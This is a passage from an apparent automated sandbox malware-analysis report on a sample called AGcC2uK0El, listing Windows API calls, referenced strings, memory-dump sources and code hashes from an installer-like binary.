                                                                                    • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
                                                                                    • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText$EmptyRect
                                                                                    • String ID:
                                                                                    • API String ID: 182455014-2867612384
                                                                                    • Opcode ID: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                                    • Instruction ID: 68feaf95479c8b0f8d19ac4d8bed049c81d0e9902cdc902b6301711e3864cdc7
                                                                                    • Opcode Fuzzy Hash: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                                    • Instruction Fuzzy Hash: 435152B0A01248AFDB50DFA5C885BDEBBF8FF49304F08447AE845EB251D7789944CB64
                                                                                    APIs
                                                                                    • 73A0A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12
                                                                                      • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0042EE35
                                                                                    • 73A0A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                    • String ID: ...\
                                                                                    • API String ID: 2998766281-983595016
                                                                                    • Opcode ID: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                                    • Instruction ID: f7e46b9156472dd3d3dfb1d2a9ceb23c9820bf6754630174aa29599cfb354949
                                                                                    • Opcode Fuzzy Hash: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                                    • Instruction Fuzzy Hash: E0318170B00128ABDF11EF9AD841BAEB7B9EB48308F91447BF410A7291D7785D45CA69
                                                                                    APIs
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00454848
                                                                                    • GetLastError.KERNEL32(0000003C,00000000,00454891,?,?,?), ref: 00454859
                                                                                      • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                    • String ID: <$SuG
                                                                                    • API String ID: 893404051-1504269210
                                                                                    • Opcode ID: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
                                                                                    • Instruction ID: e58c708146c2f721f38e64faa2aac8e88425893723770a95bfdd45a03fe75b0c
                                                                                    • Opcode Fuzzy Hash: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
                                                                                    • Instruction Fuzzy Hash: 7D218574A00249ABDB10EF65C88269E7BE8EF49349F50403AF844EB381D7789D498B98
                                                                                    APIs
                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                    • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitMessageProcess
                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                    • API String ID: 1220098344-2970929446
                                                                                    • Opcode ID: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                                    • Instruction ID: 7c754c0b660761a5bc1c63aadfae0e1dd2c0c13e95eab211716155318e46cc07
                                                                                    • Opcode Fuzzy Hash: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                                    • Instruction Fuzzy Hash: E421CB606442514ADB11AB799C857163B9197E534CF04817BE700B73F2CA7D9C64C7EF
                                                                                    APIs
                                                                                      • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                      • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                      • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455E48
                                                                                    • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455E75
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                    • String ID: LoadTypeLib$RegisterTypeLib
                                                                                    • API String ID: 1312246647-2435364021
                                                                                    • Opcode ID: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
                                                                                    • Instruction ID: e41936e4c8b07abfc49a8f10cd7ccd4a21eee7bf761b45698a75813e6285fe04
                                                                                    • Opcode Fuzzy Hash: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
                                                                                    • Instruction Fuzzy Hash: 59119631B00A04AFDB11DFA6CD62A5FB7ADEB89705F10847ABC04D3652DB789E04CA54
                                                                                    APIs
                                                                                    • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456366
                                                                                    • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456403
                                                                                    Strings
                                                                                    • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456392
                                                                                    • Failed to create DebugClientWnd, xrefs: 004563CC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                    • API String ID: 3850602802-3720027226
                                                                                    • Opcode ID: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
                                                                                    • Instruction ID: 9b4fe9b07e62f64c95e3ed8797323406b80950c852a807cd7dd65319169fa691
                                                                                    • Opcode Fuzzy Hash: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
                                                                                    • Instruction Fuzzy Hash: 1111E3B06042506FD300AB699C81B5F7BA89B56309F45443BF984DF383D3798C18CBAE
                                                                                    APIs
                                                                                      • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                    • GetFocus.USER32 ref: 004771FF
                                                                                    • GetKeyState.USER32(0000007A), ref: 00477211
                                                                                    • WaitMessage.USER32(?,00000000,00477238,?,00000000,0047725F,?,?,00000001,00000000,?,?,?,0047E9E6,00000000,0047F8E7), ref: 0047721B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FocusMessageStateTextWaitWindow
                                                                                    • String ID: Wnd=$%x
                                                                                    • API String ID: 1381870634-2927251529
                                                                                    • Opcode ID: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
                                                                                    • Instruction ID: 1bcd60996d2698ed373ebf422e897d28d135c5275452f214efeb8338eb806bda
                                                                                    • Opcode Fuzzy Hash: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
                                                                                    • Instruction Fuzzy Hash: A611CA30604204AFC701EFA9DC41ADE77F8EB49704B9184F6F418E3252D73C6D10CA6A
                                                                                    APIs
                                                                                    • FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D640
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D64F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$File$LocalSystem
                                                                                    • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                    • API String ID: 1748579591-1013271723
                                                                                    • Opcode ID: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
                                                                                    • Instruction ID: 0ff0b3c23c5ed0256b313d7d525d52e9a24b5728abf6314cf281cf193483f13b
                                                                                    • Opcode Fuzzy Hash: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
                                                                                    • Instruction Fuzzy Hash: 4311F8A090C3909ED340DF2AC44432BBAE4AB89704F04892EF9D8D6381E779C948DB77
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                    • API String ID: 47109696-2631785700
                                                                                    • Opcode ID: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                                    • Instruction ID: 2bdf3aef2c60deecc2fc1a5dc8a42cc53f0a1f71867dabe890c8ddf4abdcbedd
                                                                                    • Opcode Fuzzy Hash: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                                    • Instruction Fuzzy Hash: 3AF0A4B17001109BDB10EB1AE845F5B628CDBD1316F20403FF581E7296CE7CDC06CA9A
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F79
                                                                                    • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F9C
                                                                                    Strings
                                                                                    • System\CurrentControlSet\Control\Windows, xrefs: 00481F46
                                                                                    • CSDVersion, xrefs: 00481F70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                    • API String ID: 3677997916-1910633163
                                                                                    • Opcode ID: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                                    • Instruction ID: c869957850822339a6d2b86bec0dd1f4db8a349efa053aa20552817ac18695c5
                                                                                    • Opcode Fuzzy Hash: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                                    • Instruction Fuzzy Hash: 94F01975E4020DAADF10EAD18C45BAF73BCAB04708F104967FB10E7290E779AA45CB5A
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531BA,00000000,0045325D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453529,00000000), ref: 0042D8D6
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                    • API String ID: 1646373207-4063490227
                                                                                    • Opcode ID: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                                    • Instruction ID: 226daeffb333c7fd56417753f7bf411e9e50fb36e69144697282a220664082a3
                                                                                    • Opcode Fuzzy Hash: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                                    • Instruction Fuzzy Hash: 8CE026E0F00B0012D70035BA2C83B6B108D8B88729FA0443F7899F62C7DDBCDAC40AAD
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                    • API String ID: 1646373207-260599015
                                                                                    • Opcode ID: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                                    • Instruction ID: 6bc70aa2ebf4dd36f12f6c88582c327b68e43ec59fad8d4ed568611576548916
                                                                                    • Opcode Fuzzy Hash: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                                    • Instruction Fuzzy Hash: 05D0C7D3351733566D9071FB3CC19AB018C8A116B53540177F500F6141D99DCC4115AD
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                    • API String ID: 1646373207-834958232
                                                                                    • Opcode ID: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                                    • Instruction ID: 4607b44a290c0083fd8a3bbebdee3b5c85a8181a3f50ff176a2b10a78ee17b7d
                                                                                    • Opcode Fuzzy Hash: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                                    • Instruction Fuzzy Hash: 0BB012CA68170450CC1032F28C07E1F1C0C4C80769B1604373C00F10C3CF6CD800483E
                                                                                    APIs
                                                                                      • Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                                    • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                    • API String ID: 2238633743-2683653824
                                                                                    • Opcode ID: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                                    • Instruction ID: dcd617acd20af11e442c32675adda2be3f923d80830e775180bb661fb25f4313
                                                                                    • Opcode Fuzzy Hash: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                                    • Instruction Fuzzy Hash: 67B092A0A80780A8DE10BFB3A84390B28248590B1AB20443B30207A093EB7C45145E6F
                                                                                    APIs
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D), ref: 0047C3C0
                                                                                    • FindClose.KERNEL32(000000FF,0047C3EB,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D,00000000), ref: 0047C3DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
